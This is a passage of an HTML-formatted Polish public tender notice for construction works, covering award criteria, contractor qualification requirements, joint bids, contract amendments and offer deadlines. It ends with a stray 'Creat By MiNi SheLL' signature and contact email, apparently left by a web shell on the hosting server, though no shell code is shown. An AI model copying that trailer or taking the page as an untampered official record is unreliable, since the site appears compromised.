class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu:<br/>a)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeśli to wynika z odrębnych przepisów:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>c)	sytuacji ekonomicznej i finansowej<br/>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na łączną kwotę równą co najmniej 100 000,00 zł (słownie: sto tysięcy złotych)<br/>(W przypadku wartości w walucie obcej wartość podlega przeliczeniu z zastosowaniem średniego kursu waluty obcej podawanego przez Narodowy Bank Polski dla dnia zawarcia umowy ubezpieczenia).<br/>d)	zdolności technicznej i zawodowej<br/>1)	Na potwierdzenie tego warunku Zamawiający wymaga, aby Wykonawca wykazał, że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 roboty budowlane o podobnym zakresie wykonanych robót do przedmiotu zamówienia o wartości łącznej brutto robót minimum 100 000,00 zł (w przypadku kontraktów zawieranych w walucie obcej wartość robót podlega przeliczeniu z zastosowaniem średniego kursu waluty obcej podawanego przez Narodowy Bank Polski dla dnia zawarcia umowy).<br/>UWAGA:<br/>•	Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy) realizowanego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), Zamawiający nie dopuszcza by Wykonawca polegał na doświadczeniu grupy wykonawców, której był członkiem, jeżeli faktycznie nie wykonywał wykazywanego zakresu prac. Zamawiający zastrzega możliwość zwrócenia się do wykonawcy o wyjaśnienia w zakresie faktycznie konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres obowiązków, czy wystawionych przez wykonawcę faktur.<br/>•	Zamawiający uzna za spełniony warunek SWZ w przypadku, gdy doświadczenie wykazane przez Wykonawcę będzie dotyczyło również remontu, budowy, przebudowy budynków jednorodzinnych lub administracji publicznej w zakresie ogólnobudowlanym obejmującym instalacje wod-kan, co i elektryczne.<br/>2)	Na potwierdzenie tego warunku Zamawiający wymaga, aby Wykonawca wykazał, że dysponuje lub będzie dysponować niżej wymienionym sprzętem:<br/>-	min. 1 szt. koparkę,<br/>-	min. 1 zagęszczarkę,<br/>-	min. 1 samochód samowyładowczy,<br/>3)	Na potwierdzenie tego warunku Zamawiający wymaga, aby Wykonawca wykazał, że dysponuje co najmniej:<br/>-	jedną osobą, uprawnioną do wykonywania samodzielnych funkcji w budownictwie, tj. do kierowania robotami budowlanymi odpowiednio jako kierownik budowy lub kierownik robót w specjalności konstrukcyjno-budowlanej bez ograniczeń, oraz posiadającą co najmniej 3 letnie doświadczenie zawodowe w kierowaniu tymi robotami,<br/>-	jedną osobą, która będzie pełniła funkcję kierownika robót branży sanitarnej, posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,<br/>-	jedną osobą, która będzie pełniła funkcję kierownika robót branży elektrycznej, posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń,<br/>skierowane przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialne za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacje o podstawie do dysponowania tymi osobami.<br/>Uwaga:<br/>-	za uprawnienia budowlane odpowiadające wyżej wymienionym uznane zostaną uprawnienia, które wydane zostały na podstawie obowiązujących obecnie przepisów, jak i wcześniej obowiązujących przepisów (przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane) oraz odpowiadające im uprawnienia wydane obywatelom państw członkowskim Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu – EFTA (strony umowy o Europejskim Obszarze Gospodarczym) z zastrzeżeniem, art. 12a oraz innych przepisów ustawy Prawo Budowlane (tekst jedn. Dz. U. z 2020 r., poz. 1333 ze zm.) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Z 2020 r., poz. 220).<br/>-	staż zawodowy ustala się licząc od dnia uzyskania uprawnień do dnia otwarcia ofert. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2.1	informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 108 ust. 1 pkt 1, 2 i 4 ustawy Pzp, wystawiona nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>2.2	oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w art. 108 ust. 1 pkt 3, art. 108 ust. 1 pkt 4, art. 108 ust. 1 pkt 5, art. 108 ust. 1 pkt 6 sporządzone na podstawie wzoru stanowiącego Załącznik nr 8 do niniejszej SWZ;<br/>2.3	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzonego nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp;<br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa powyżej w pkt. XII.2, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>2.4	oświadczenia wykonawcy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej sporządzone na podstawie wzoru stanowiącego Załącznik nr 7 do niniejszej SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu:<br/>a)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeśli to wynika z odrębnych przepisów:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>c)	sytuacji ekonomicznej i finansowej<br/>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na łączną kwotę równą co najmniej 100 000,00 zł (słownie: sto tysięcy złotych)<br/>(W przypadku wartości w walucie obcej wartość podlega przeliczeniu z zastosowaniem średniego kursu waluty obcej podawanego przez Narodowy Bank Polski dla dnia zawarcia umowy ubezpieczenia).<br/>d)	zdolności technicznej i zawodowej<br/>1)	Na potwierdzenie tego warunku Zamawiający wymaga, aby Wykonawca wykazał, że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 roboty budowlane o podobnym zakresie wykonanych robót do przedmiotu zamówienia o wartości łącznej brutto robót minimum 100 000,00 zł (w przypadku kontraktów zawieranych w walucie obcej wartość robót podlega przeliczeniu z zastosowaniem średniego kursu waluty obcej podawanego przez Narodowy Bank Polski dla dnia zawarcia umowy).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane - potwierdzający warunki udziału w postępowaniu opisane w pkt X.1.d 1) SWZ i przygotowany zgodnie z załącznikiem nr 5 do SWZ: Wykaz robót<br/>oraz<br/>załączenie dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>3.2	Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - potwierdzający warunki udziału w postępowaniu opisane w pkt X.1.d 3) SWZ i przygotowany zgodnie z Załącznikiem 4 do SWZ: Wykaz osób.<br/>3.3	Wykaz sprzętu, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami - potwierdzający warunki udziału w postępowaniu opisane w pkt X.1.d 2) SWZ i przygotowany zgodnie z Załącznikiem nr 3 do SWZ: Wykaz sprzętu.<br/>3.4	Dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia - potwierdzający warunek udziału w postępowaniu opisany w pkt X.1.c SWZ <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> n/d <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający, dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 58 ustawy Pzp) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:<br/>1.	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>2.	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem, którego adres należy wpisać w Formularzu oferty.<br/>3.	Pełnomocnictwo lub inny dokument (np. umowa konsorcjum, spółki cywilnej) z którego wynika takie pełnomocnictwo należy złożyć razem z ofertą.<br/>4.	W odniesieniu do warunków udziału określonych w pkt X.1 lit. d 1) SWZ, wymagania te muszą być spełnione przez jednego z Wykonawców składających ofertę wspólną (nie musi ich spełniać osobno każdy z Wykonawców składających ofertę wspólną). Na ich potwierdzenie należy złożyć dokumenty określone w pkt XII.3.1 SWZ.<br/>5.	W odniesieniu do warunków udziału określonych w pkt X.1c oraz X.1 lit. d 2) i 3) SWZ, wymagania te muszą być spełnione wspólnie przez Wykonawców składających ofertę wspólną (nie musi ich spełniać osobno każdy z Wykonawców składających ofertę wspólną). Na ich potwierdzenie należy złożyć dokumenty określone w pkt XII.3.2÷XII.3.4 SWZ.<br/>6.	Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, na podstawie treści Załącznika nr 9 do SWZ, aktualny na dzień składania ofert, celem wstępnego potwierdzenia, że każdy z Wykonawców ubiegających się wspólnie o zamówienie nie podlega wykluczeniu z postępowania oraz spełnia warunki udziału w postępowaniu określone w SWZ w zakresie, w którym każdy z nich wykazuje brak podstaw wykluczenia z postępowania oraz spełnia warunki udziału w postępowaniu.<br/>7.	Każdy z Wykonawców występujących wspólnie obowiązany jest do wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego. W takim przypadku oświadczenia lub dokumenty wymienione w pkt XII.2 SWZ składa każdy z Wykonawców występujących wspólnie.<br/>8.	Zamawiający nie zastrzega obowiązku osobistego wykonania przez jednego z Wykonawców kluczowych części zamówienia.<br/>9.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane / usługi / dostawy, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane / dostawy / usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Na podstawie art. 455 ust. 1 pkt. 1 ustawy z dnia 11 września 2019 r. Prawo Zamówień Publicznych, Zamawiający przewiduje możliwość dokonania zmian postanowień umowy zawartej z wybranym Wykonawcą w następujących przypadkach.<br/>2.	Zmiany i uzupełnienia umowy wymagają dla swej ważności aneksu w formie pisemnej.<br/>3.	Zmiany wynagrodzenia umownego Wykonawcy może ulec zmianie w następujących warunkach:<br/>a.	W przypadku zmiany stawki VAT – jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania robót po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia Wykonawcy o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę. Jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania robót po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT zapłaconego przez Wykonawcę,<br/>4.	Zmiana treści umowy, jeżeli zajdzie potrzeba w sytuacji zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego.<br/>5.	Zmiana sposobu spełnienia świadczenia, zmiana parametrów realizowanego zamówienia:<br/>a. Zmiany technologiczne, w szczególności konieczność realizacji przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych/technologicznych, materiałowych niż wskazane w opisie zamówienia, w sytuacji gdy zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem, bądź ze względu na zmiany obowiązującego prawa,<br/>b. Wystąpienie prac zamiennych, wynagrodzenie jednostkowe Wykonawcy ulega zmianie odpowiednio o kwotę wynikającą z zaakceptowanego przez umocowanego przedstawiciela Zamawiającego kosztorysu różnicowego, bez możliwości przekroczenia wysokości wynagrodzenia umownego określonego w umowie,<br/>c. zmiana sposobu realizacji przedmiotu umowy może nastąpić na podstawie ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (t.j. Dz. U. z 2020 r., poz. 1842 ze zm.).<br/>4. Zmiana Wykonawcy lub Podwykonawcy:<br/>a. Zmiana umowy może nastąpić również w wyniku zmiany Wykonawcy, Podwykonawcy lub rezygnacji z udziału podwykonawcy przy realizacji przedmiotu umowy. Zamawiający dopuści zmianę pod warunkiem, że nowy Wykonawca wykaże, że nie podlega wykluczeniu z postępowania na warunkach określonych przez Zamawiającego w postępowaniu o udzielenie zamówienia publicznego oraz wykaże, że spełnia warunki udziału w postępowaniu o udzielenie zamówienia przez dotychczasowego Wykonawcę.<br/>5. Zmiany będą korzystne dla Zamawiającego i nie będą:<br/>a. Wprowadzane warunki, które gdyby zostały ujęte w ramach procedury przetargowej udzielenia zamówienia umożliwiłyby dopuszczenie innych ofert niż ta, która została pierwotnie dopuszczona,<br/>b. Modyfikowały równowagi ekonomicznej umowy na korzyść Wykonawcy w sposób, który nie był przewidziany w postanowieniach pierwotnego zamówienia,<br/>c. Istotne w rozumieniu art. 454 ust. 2 ustawy Prawo Zamówień Publicznych.<br/>6. Warunki dokonania zmian:<br/>a. Strona występująca o zmianę postanowień niniejszej umowy zobowiązana jest do udokumentowania zaistnienia okoliczności, o których mowa powyżej,<br/>b. Strona występująca o zmianę postanowień niniejszej umowy zobowiązana jest do złożenia pisemnego wniosku o zmianę postanowień umowy,<br/>c. Wniosek, o którym mowa w ppkt. b musi zawierać:<br/>	- Opis propozycji zmiany,<br/>	- Uzasadnienie zmiany,<br/>	- Opis wpływu zmiany na warunki realizacji umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem formularza do złożenia oferty na ePUAP i udostępnionego również na miniPortalu. 2.	Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na stronie https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-25 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com